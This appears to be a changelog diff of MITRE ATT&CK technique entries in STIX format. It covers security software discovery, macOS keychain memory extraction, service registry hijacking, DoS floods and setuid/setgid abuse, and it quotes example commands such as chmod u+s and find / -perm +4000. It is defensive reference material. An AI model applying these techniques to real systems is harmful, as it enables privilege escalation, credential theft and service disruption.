| x_mitre_permissions_required | ['User'] | |
| external_references | CAPEC-581 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:05:00.198000+00:00 | 2022-04-11 22:26:34.327000+00:00 |
| description | Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) |
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the DescribeSecurityGroups action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud) |
| external_references[1]['source_name'] | capec | Expel IO Evil in AWS |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/581.html | https://expel.io/blog/finding-evil-in-aws/ |
| external_references[2]['source_name'] | Expel IO Evil in AWS | DescribeSecurityGroups - Amazon Elastic Compute Cloud |
| external_references[2]['description'] | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. | Amazon Web Services, Inc. . (2022). DescribeSecurityGroups. Retrieved January 28, 2022. |
| external_references[2]['url'] | https://expel.io/blog/finding-evil-in-aws/ | https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html |
| x_mitre_data_sources[0] | Firewall: Firewall Metadata | Process: OS API Execution |
| x_mitre_data_sources[1] | Firewall: Firewall Enumeration | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | Firewall: Firewall Enumeration |
| x_mitre_data_sources[4] | Process: OS API Execution | Firewall: Firewall Metadata |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/581.html', 'external_id': 'CAPEC-581'} |
| Old Description | New Description |
|---|---|
| An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain) | An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-02-17 13:16:53.850000+00:00 | 2022-03-08 21:43:20.609000+00:00 |
| description | An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain) | An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain) |
| x_mitre_data_sources[0] | Command: Command Execution | Process: Process Access |
| x_mitre_data_sources[1] | Process: Process Access | Command: Command Execution |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications. | Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW) |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'root'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 17:05:44.743000+00:00 | 2022-10-19 21:18:29.349000+00:00 |
| description | Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications. | Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW) |
| external_references[1]['source_name'] | US-CERT Alert TA15-314A Web Shells | volexity_0day_sophos_FW |
| external_references[1]['description'] | US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. | Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022. |
| external_references[1]['url'] | https://www.us-cert.gov/ncas/alerts/TA15-314A | https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ |
| x_mitre_data_sources[0] | File: File Creation | Process: Process Creation |
| x_mitre_data_sources[1] | File: File Modification | Application Log: Application Log Content |
| x_mitre_data_sources[2] | Process: Process Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | File: File Modification |
| x_mitre_data_sources[5] | Application Log: Application Log Content | File: File Creation |
| x_mitre_version | 1.2 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT Alert TA15-314A Web Shells', 'description': 'US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA15-314A'} | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
| Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012) | Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | ASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019. | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. | |
| external_references | Cloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019. | |
| external_references | CAPEC-488 | |
| external_references | CAPEC-489 | |
| external_references | CAPEC-528 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-488 | |
| external_references | CAPEC-489 | |
| external_references | CAPEC-528 | |
| external_references | Cloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019. | |
| external_references | ASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019. | |
| external_references | Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:11:12.815000+00:00 | 2022-04-19 23:20:50.470000+00:00 |
| description | Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012) | Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012) |
| external_references[1]['source_name'] | capec | Arbor SSLDoS April 2012 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/488.html | https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new |
| external_references[2]['source_name'] | capec | Cisco DoSdetectNetflow |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/489.html | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf |
| external_references[3]['source_name'] | capec | Cloudflare HTTPflood |
| external_references[3]['url'] | https://capec.mitre.org/data/definitions/528.html | https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/ |
| external_references[5]['source_name'] | Cloudflare HTTPflood | capec |
| external_references[5]['url'] | https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/ | https://capec.mitre.org/data/definitions/488.html |
| external_references[6]['source_name'] | Arbor SSLDoS April 2012 | capec |
| external_references[6]['url'] | https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new | https://capec.mitre.org/data/definitions/489.html |
| external_references[7]['source_name'] | Cisco DoSdetectNetflow | capec |
| external_references[7]['url'] | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf | https://capec.mitre.org/data/definitions/528.html |
| x_mitre_data_sources[0] | Sensor Health: Host Status | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Flow | Sensor Health: Host Status |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)
Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-02 22:11:32.017000+00:00 | 2022-07-28 18:47:11.957000+00:00 |
| external_references[1]['source_name'] | Talos Olympic Destroyer 2018 | SecureWorks WannaCry Analysis |
| external_references[1]['description'] | Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. | Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019. |
| external_references[1]['url'] | https://blog.talosintelligence.com/2018/02/olympic-destroyer.html | https://www.secureworks.com/research/wcry-ransomware-analysis |
| external_references[2]['source_name'] | Novetta Blockbuster | Talos Olympic Destroyer 2018 |
| external_references[2]['description'] | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. | Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. |
| external_references[2]['url'] | https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf | https://blog.talosintelligence.com/2018/02/olympic-destroyer.html |
| external_references[3]['source_name'] | SecureWorks WannaCry Analysis | Novetta Blockbuster |
| external_references[3]['description'] | Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019. | Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016. |
| external_references[3]['url'] | https://www.secureworks.com/research/wcry-ransomware-analysis | https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Termination |
| x_mitre_data_sources[2] | Process: OS API Execution | Command: Command Execution |
| x_mitre_data_sources[3] | Service: Service Metadata | File: File Modification |
| x_mitre_data_sources[5] | File: File Modification | Service: Service Metadata |
| x_mitre_data_sources[6] | Process: Process Termination | Process: OS API Execution |
| Description |
|---|
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)
The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)
Adversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll.(Citation: malware_hides_service) |
New Detections:
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | @r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018. | |
| external_references | CAPEC-478 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-478 | |
| external_references | Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 23:52:52.058000+00:00 | 2022-05-05 04:53:45.640000+00:00 |
| external_references[1]['source_name'] | capec | Tweet Registry Perms Weakness |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/478.html | https://twitter.com/r0wdy_/status/936365549553991680 |
| external_references[2]['source_name'] | Registry Key Security | insecure_reg_perms |
| external_references[2]['description'] | Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017. | Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN | https://itm4n.github.io/windows-registry-rpceptmapper-eop/ |
| external_references[3]['source_name'] | malware_hides_service | Kansa Service related collectors |
| external_references[3]['description'] | Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021. | Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019. |
| external_references[3]['url'] | https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/ | https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html |
| external_references[4]['source_name'] | Kansa Service related collectors | malware_hides_service |
| external_references[4]['description'] | Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019. | Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021. |
| external_references[4]['url'] | https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html | https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/ |
| external_references[5]['source_name'] | Tweet Registry Perms Weakness | Autoruns for Windows |
| external_references[5]['description'] | @r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018. | Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020. |
| external_references[5]['url'] | https://twitter.com/r0wdy_/status/936365549553991680 | https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns |
| external_references[6]['source_name'] | microsoft_services_registry_tree | Registry Key Security |
| external_references[6]['description'] | Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved August 25, 2021. | Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017. |
| external_references[6]['url'] | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree | https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN |
| external_references[7]['source_name'] | insecure_reg_perms | microsoft_services_registry_tree |
| external_references[7]['description'] | Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021. | Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved August 25, 2021. |
| external_references[7]['url'] | https://itm4n.github.io/windows-registry-rpceptmapper-eop/ | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree |
| external_references[9]['source_name'] | Autoruns for Windows | capec |
| external_references[9]['url'] | https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns | https://capec.mitre.org/data/definitions/478.html |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Modification | Service: Service Modification |
| x_mitre_data_sources[1] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[2] | Service: Service Metadata | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | Process: Process Creation |
| x_mitre_defense_bypassed[0] | Application control | Application Control |
| Old Description | New Description |
|---|---|
An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware). |
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgit bit, chmod 2775 and chmod g+s can be used.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.
Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-27 00:43:58.149000+00:00 | 2022-04-19 15:07:53.060000+00:00 |
| description | An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware). |
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgit bit, chmod 2775 and chmod g+s can be used.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.
